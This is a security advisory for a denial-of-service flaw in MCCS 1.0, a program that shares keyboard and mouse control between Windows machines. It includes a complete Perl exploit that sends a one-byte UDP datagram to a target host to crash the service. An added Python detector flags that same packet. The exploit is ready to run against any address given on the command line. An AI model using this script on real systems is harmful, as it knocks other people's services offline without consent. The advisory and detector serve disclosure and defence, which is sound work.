Update:
20:11 18/09/2005
Subject:
"MCCS Server/Client Command Denial Of Service"
Version:
MCCS 1.0
Operating System:
- All Windows
Typical software:
- Shareware
Severity Flaw:
- low
Description:
MCCS (Multi-Computer Control Systems) is software that needs two computers and sends commands between them over UDP.
You can start the MCCS client software on the client computer at any time in the process.
You will be able to switch your server keyboard/mouse to the client computer as soon as
the client is added on the server and the client software is started on the client computer.
Vulnerability:
A denial of service condition has been disclosed in the client/server component of the MCCS application itself
that could allow a remote attacker to crash the service by sending a malicious UDP packet to the specified port.
This could leave the server application crashed or needing to be closed.
Exploit:
#!/usr/bin/perl
#
# MCCS Server\Client Command DOS Exploit
# --------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.xclusive-software.com
#
use IO::Socket;
print("\n MCCS Command DOS Exploit\n");
print("-----------------------------\n");
$str = "\x41";
if($#ARGV < 0 || $#ARGV > 1) {
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };
$adr = $ARGV[0];
# "\x38\x30" is the string "80": the destination UDP port
$prt = "\x38\x30";
print "[+] Connect to host..\n";
sleep 2;
# "\x75\x64\x70" is the string "udp"
$remote = IO::Socket::INET->new(Proto=>"\x75\x64\x70", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n";
print "[+] Connected\n";
$remote->autoflush(1);
print "[+] Sending bad string..\n";
sleep 2;
print $remote "$str" or die "[-] Error: can't send string code\n";
print "[*] Client Server SHUTDOWNED!\n\n";
print "press any key to exit..\n";
$bla = <STDIN>;
close $remote;
Solution:
Upgrade to the latest version, which is no longer vulnerable.
Contact the vendor for more information regarding this issue.
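Detection (added example, not part of the original advisory): the code below parses raw IPv4 packets and flags the datagram the proof of concept sends, that is UDP to destination port 80 with the one-byte payload 0x41. The function names and sample packets are constructed for illustration, and matching only the exact PoC bytes is an assumption, since the advisory does not say which other inputs trigger the crash.

```python
import struct

MCCS_PORT = 80       # "\x38\x30" in the PoC is the string "80"
POC_PAYLOAD = b"A"   # "\x41" in the PoC: the entire datagram body


def udp_datagram(packet: bytes):
    """Return (dst_port, payload) for an unfragmented IPv4/UDP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None                                  # not IPv4
    ihl = (packet[0] & 0x0F) * 4                     # IP header length in bytes
    if ihl < 20 or len(packet) < ihl + 8 or packet[9] != 17:
        return None                                  # bad header or not UDP
    if struct.unpack("!H", packet[6:8])[0] & 0x1FFF:
        return None                                  # later fragment: no UDP header
    _sport, dport, ulen, _csum = struct.unpack("!HHHH", packet[ihl:ihl + 8])
    if ulen < 8 or ihl + ulen > len(packet):
        return None                                  # UDP length field is inconsistent
    return dport, packet[ihl + 8:ihl + ulen]


def matches_poc(packet: bytes) -> bool:
    """True when the packet is the exact datagram the advisory's PoC sends."""
    return udp_datagram(packet) == (MCCS_PORT, POC_PAYLOAD)


def scan(packets):
    """Return the indexes of packets that match the PoC datagram."""
    return [i for i, p in enumerate(packets) if matches_poc(p)]


def build_ipv4_udp(dport: int, payload: bytes, sport: int = 40000) -> bytes:
    """Constructed sample packet; addresses come from RFC 5737 documentation ranges."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes([192, 0, 2, 10]), bytes([198, 51, 100, 20]))
    return ip + udp


# Constructed capture: only index 0 is the PoC datagram.
SAMPLE_CAPTURE = [
    build_ipv4_udp(80, b"A"),
    build_ipv4_udp(80, b"hello"),
    build_ipv4_udp(53, b"A"),
    build_ipv4_udp(80, b"A")[:25],   # truncated on the wire
]

if __name__ == "__main__":
    print("PoC-like datagrams at indexes:", scan(SAMPLE_CAPTURE))
```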
Vendor URL:
Mail - xclusive-software@keyoscrypt.com
WWW - http://www.xclusive-software.com
Published:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com